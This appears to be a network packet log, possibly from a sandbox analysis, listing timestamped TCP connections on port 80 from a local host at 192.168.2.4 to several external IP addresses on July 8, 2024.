Jul 8, 2024 07:21:13.808795929 CEST	80	49759	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:13.808866978 CEST	49759	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:14.664796114 CEST	49759	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:15.683665037 CEST	49760	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:15.688635111 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.688788891 CEST	49760	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:15.691659927 CEST	49760	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:15.696589947 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.696603060 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.696630001 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.696640015 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.696649075 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.696670055 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.696680069 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.696737051 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:15.696748018 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:16.346019030 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:16.346038103 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:16.346093893 CEST	49760	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:16.346548080 CEST	80	49760	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:16.346595049 CEST	49760	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:17.196002960 CEST	49760	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:18.215276003 CEST	49761	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:18.220344067 CEST	80	49761	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:18.220427036 CEST	49761	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:18.222791910 CEST	49761	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:18.231955051 CEST	80	49761	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:18.865560055 CEST	80	49761	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:18.865581036 CEST	80	49761	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:18.865592957 CEST	80	49761	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:18.865629911 CEST	80	49761	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:18.865643024 CEST	80	49761	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:18.865736008 CEST	49761	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:18.865794897 CEST	49761	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:18.868695974 CEST	49761	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:18.873464108 CEST	80	49761	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:23.905642986 CEST	49762	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:23.910500050 CEST	80	49762	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:23.910609007 CEST	49762	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:23.912621975 CEST	49762	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:23.917541981 CEST	80	49762	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:24.448920012 CEST	80	49762	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:24.448975086 CEST	49762	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:25.415893078 CEST	49762	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:25.422471046 CEST	80	49762	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:26.434099913 CEST	49763	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:26.441055059 CEST	80	49763	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:26.441133976 CEST	49763	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:26.443448067 CEST	49763	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:26.448297977 CEST	80	49763	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:26.931874037 CEST	80	49763	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:26.932039976 CEST	49763	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:27.945797920 CEST	49763	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:27.950851917 CEST	80	49763	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.964231014 CEST	49764	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:28.969218016 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.969295979 CEST	49764	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:28.971529961 CEST	49764	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:28.976380110 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.976392031 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.976413965 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.976423979 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.976433039 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.976586103 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.976600885 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.976612091 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:28.976625919 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:29.444242001 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:29.444344997 CEST	49764	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:30.477132082 CEST	49764	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:30.482284069 CEST	80	49764	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:31.495728016 CEST	49765	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:31.500608921 CEST	80	49765	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:31.500878096 CEST	49765	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:31.503998041 CEST	49765	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:31.508822918 CEST	80	49765	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:31.967791080 CEST	80	49765	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:31.967911959 CEST	80	49765	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:31.970654964 CEST	49765	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:31.970654964 CEST	49765	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:31.975526094 CEST	80	49765	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:36.996294975 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:37.001277924 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:37.001358986 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:37.003087044 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:37.007981062 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:37.482023001 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:37.482151031 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:37.485711098 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:38.508471966 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:39.526633024 CEST	49767	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:39.531677961 CEST	80	49767	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:39.533771992 CEST	49767	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:39.535772085 CEST	49767	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:39.540565968 CEST	80	49767	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:40.060755968 CEST	80	49767	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:40.060781956 CEST	80	49767	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:40.060794115 CEST	80	49767	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:40.061021090 CEST	49767	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:41.039628983 CEST	49767	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:42.059942007 CEST	49768	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:42.064781904 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.067840099 CEST	49768	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:42.071683884 CEST	49768	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:42.076514006 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.076585054 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.076594114 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.076602936 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.076611042 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.076802015 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.076811075 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.076829910 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.076838017 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.527961016 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.528528929 CEST	80	49768	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:42.528568029 CEST	49768	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:43.587821007 CEST	49768	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:44.607058048 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:44.613519907 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:44.613591909 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:44.616017103 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:44.622519970 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:45.100048065 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:45.100387096 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:45.103986979 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:45.107702017 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 8, 2024 07:21:45.114187002 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 8, 2024 07:21:50.245099068 CEST	49770	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:50.250195980 CEST	80	49770	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:50.250263929 CEST	49770	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:50.252672911 CEST	49770	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:50.257550001 CEST	80	49770	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:50.976327896 CEST	80	49770	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:50.976346970 CEST	80	49770	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:50.976407051 CEST	49770	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:51.758554935 CEST	49770	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:52.777226925 CEST	49771	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:52.782130957 CEST	80	49771	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:52.782294989 CEST	49771	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:52.784356117 CEST	49771	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:52.789163113 CEST	80	49771	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:53.510607004 CEST	80	49771	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:53.510965109 CEST	80	49771	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:53.511982918 CEST	49771	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:54.289948940 CEST	49771	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:55.308105946 CEST	49772	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:55.313098907 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.313782930 CEST	49772	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:55.317665100 CEST	49772	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:55.322666883 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.322679043 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.322688103 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.322700977 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.322716951 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.322777987 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.322788000 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.322822094 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:55.322832108 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:56.169691086 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:56.170629025 CEST	80	49772	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:56.170677900 CEST	49772	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:56.821507931 CEST	49772	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:57.839796066 CEST	49773	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:58.045044899 CEST	80	49773	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:58.045188904 CEST	49773	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:58.047709942 CEST	49773	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:58.052474976 CEST	80	49773	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:58.753254890 CEST	80	49773	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:58.753365993 CEST	80	49773	45.130.41.38	192.168.2.4
Jul 8, 2024 07:21:58.753417969 CEST	49773	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:58.757097006 CEST	49773	80	192.168.2.4	45.130.41.38
Jul 8, 2024 07:21:58.761924982 CEST	80	49773	45.130.41.38	192.168.2.4
Jul 8, 2024 07:22:03.785214901 CEST	49774	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:03.790112019 CEST	80	49774	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:03.790293932 CEST	49774	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:03.793648005 CEST	49774	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:03.798552990 CEST	80	49774	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:04.291194916 CEST	80	49774	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:04.291250944 CEST	49774	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:05.306047916 CEST	49774	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:05.310950041 CEST	80	49774	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:06.324745893 CEST	49775	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:06.398756027 CEST	80	49775	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:06.398833990 CEST	49775	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:06.401206970 CEST	49775	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:06.406186104 CEST	80	49775	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:06.897026062 CEST	80	49775	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:06.897083998 CEST	49775	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:07.914587021 CEST	49775	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:07.919544935 CEST	80	49775	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.937254906 CEST	49776	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:08.942084074 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.942148924 CEST	49776	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:08.945113897 CEST	49776	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:08.950036049 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.950045109 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.950079918 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.950088024 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.950130939 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.950139999 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.950185061 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.950195074 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:08.950203896 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:09.434906006 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:09.439733982 CEST	49776	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:10.461478949 CEST	49776	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:10.466371059 CEST	80	49776	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:11.480068922 CEST	49777	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:11.485132933 CEST	80	49777	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:11.485264063 CEST	49777	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:11.489639997 CEST	49777	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:11.495702982 CEST	80	49777	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:12.128046989 CEST	80	49777	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:12.128067017 CEST	80	49777	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:12.128247976 CEST	49777	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:12.128390074 CEST	80	49777	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:12.128485918 CEST	49777	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:12.130822897 CEST	49777	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:12.135649920 CEST	80	49777	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:17.160156965 CEST	49778	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:17.164988995 CEST	80	49778	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:17.165756941 CEST	49778	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:17.169641018 CEST	49778	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:17.174443960 CEST	80	49778	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:17.863339901 CEST	80	49778	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:17.865710020 CEST	49778	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:17.870131016 CEST	80	49778	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:17.873713970 CEST	49778	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:18.680290937 CEST	49778	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:18.685175896 CEST	80	49778	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:19.701639891 CEST	49779	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:19.706676960 CEST	80	49779	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:19.709752083 CEST	49779	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:19.711725950 CEST	49779	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:19.716619015 CEST	80	49779	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:20.186646938 CEST	80	49779	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:20.186711073 CEST	49779	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:21.227653980 CEST	49779	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:21.232511044 CEST	80	49779	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.246989012 CEST	49780	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:22.251975060 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.252051115 CEST	49780	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:22.255074024 CEST	49780	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:22.260974884 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.260987043 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.261007071 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.261015892 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.261039019 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.261049986 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.261069059 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.261079073 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.261087894 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.714014053 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:22.714076996 CEST	49780	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:23.761647940 CEST	49780	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:23.766577005 CEST	80	49780	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:24.776890993 CEST	49781	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:24.781763077 CEST	80	49781	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:24.781852007 CEST	49781	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:24.783778906 CEST	49781	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:24.788608074 CEST	80	49781	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:25.259282112 CEST	80	49781	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:25.259361982 CEST	80	49781	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:25.263956070 CEST	49781	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:25.263956070 CEST	49781	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:22:25.268753052 CEST	80	49781	3.33.130.190	192.168.2.4
Jul 8, 2024 07:22:30.293658972 CEST	49782	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:30.298518896 CEST	80	49782	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:30.298583984 CEST	49782	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:30.300559044 CEST	49782	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:30.305391073 CEST	80	49782	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:31.108577013 CEST	80	49782	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:31.148909092 CEST	49782	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:31.159240961 CEST	80	49782	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:31.159301996 CEST	49782	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:31.805635929 CEST	49782	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:32.824450970 CEST	49783	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:32.829438925 CEST	80	49783	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:32.829519033 CEST	49783	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:32.831715107 CEST	49783	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:32.836623907 CEST	80	49783	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:33.654318094 CEST	80	49783	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:33.705966949 CEST	80	49783	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:33.706130981 CEST	49783	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:34.336786985 CEST	49783	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:35.355602980 CEST	49784	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:35.360651970 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.361730099 CEST	49784	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:35.365649939 CEST	49784	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:35.370486975 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.370558977 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.370568037 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.370578051 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.370596886 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.370605946 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.370613098 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.370764017 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:35.370771885 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:36.170408010 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:36.227015018 CEST	49784	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:36.228416920 CEST	80	49784	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:36.228462934 CEST	49784	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:36.867690086 CEST	49784	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:37.886084080 CEST	49785	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:37.890990019 CEST	80	49785	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:37.891164064 CEST	49785	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:37.893135071 CEST	49785	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:37.897939920 CEST	80	49785	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:38.684381008 CEST	80	49785	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:38.724931955 CEST	49785	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:38.735207081 CEST	80	49785	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:38.735286951 CEST	49785	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:38.736229897 CEST	49785	80	192.168.2.4	103.176.91.154
Jul 8, 2024 07:22:38.740978003 CEST	80	49785	103.176.91.154	192.168.2.4
Jul 8, 2024 07:22:43.769704103 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:43.774590969 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:43.774831057 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:43.777719975 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:43.782532930 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838641882 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838674068 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838685989 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838728905 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838741064 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838753939 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838766098 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838941097 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838954926 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838967085 CEST	80	49786	5.78.41.174	192.168.2.4
Jul 8, 2024 07:22:44.838972092 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.838972092 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.838972092 CEST	49786	80	192.168.2.4	5.78.41.174
Jul 8, 2024 07:22:44.839056969 CEST	49786	80	192.168.2.4	5.78.41.174
